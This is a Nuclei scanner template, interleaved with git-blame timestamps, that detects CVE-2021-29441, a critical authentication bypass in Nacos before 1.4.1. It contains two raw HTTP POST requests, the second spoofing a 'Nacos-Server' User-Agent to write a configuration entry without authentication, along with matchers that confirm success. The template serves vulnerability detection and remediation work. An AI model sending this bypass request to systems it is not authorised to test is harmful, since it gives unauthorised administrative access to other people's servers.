2021-04-28 04:54:36 +00:00
|
|
|
id: CVE-2021-29441
|
|
|
|
|
|
|
|
info:
|
2022-05-18 20:58:07 +00:00
|
|
|
name: Nacos <1.4.1 - Authentication Bypass
|
2022-04-22 10:38:41 +00:00
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
2021-04-28 04:54:36 +00:00
|
|
|
description: |
|
2021-04-28 14:01:25 +00:00
|
|
|
This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.
|
|
|
|
|
2021-04-28 04:54:36 +00:00
|
|
|
In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
|
|
|
|
Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
|
|
|
|
enables Nacos servers to bypass this filter and therefore skip authentication checks.
|
|
|
|
This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
|
|
|
|
This issue may allow any user to carry out any administrative tasks on the Nacos server.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29441).
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/alibaba/nacos/issues/4701
|
|
|
|
- https://github.com/advisories/GHSA-36hp-jr8h-556f
|
|
|
|
- https://github.com/alibaba/nacos/pull/4703
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2021-29441
|
|
|
|
cwe-id: CWE-290
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.96644
|
2023-10-30 20:55:37 +00:00
|
|
|
epss-percentile: 0.99505
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: alibaba
|
|
|
|
product: nacos
|
|
|
|
tags: nacos,auth-bypass,cve,cve2021
|
2021-04-28 04:54:36 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-05-05 12:53:07 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept: */*
|
|
|
|
- |
|
|
|
|
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept: */*
|
|
|
|
User-Agent: Nacos-Server
|
|
|
|
|
|
|
|
req-condition: true
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2021-04-28 04:54:36 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2021-05-05 12:53:07 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- "status_code_1 == 403"
|
|
|
|
- "status_code_2 == 200"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- "contains(body_1, 'Forbidden')"
|
2021-05-06 09:24:08 +00:00
|
|
|
- "body_2 == 'true'"
|
2021-05-05 12:53:07 +00:00
|
|
|
condition: and
|
|
|
|
|
2021-04-28 04:54:36 +00:00
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: header
|
2021-04-28 04:54:36 +00:00
|
|
|
words:
|
|
|
|
- "application/json"
|
2023-10-31 10:54:20 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022100f04bc6956e5c34520b6e2f70b85f724dff409a12f46f07c38b25bb508f299242022027089f63edf64c4de58d9348a38a81378c154a0fb66baf506adb8de67fd0372f:922c64590222798bb761d5b6d8e72950
|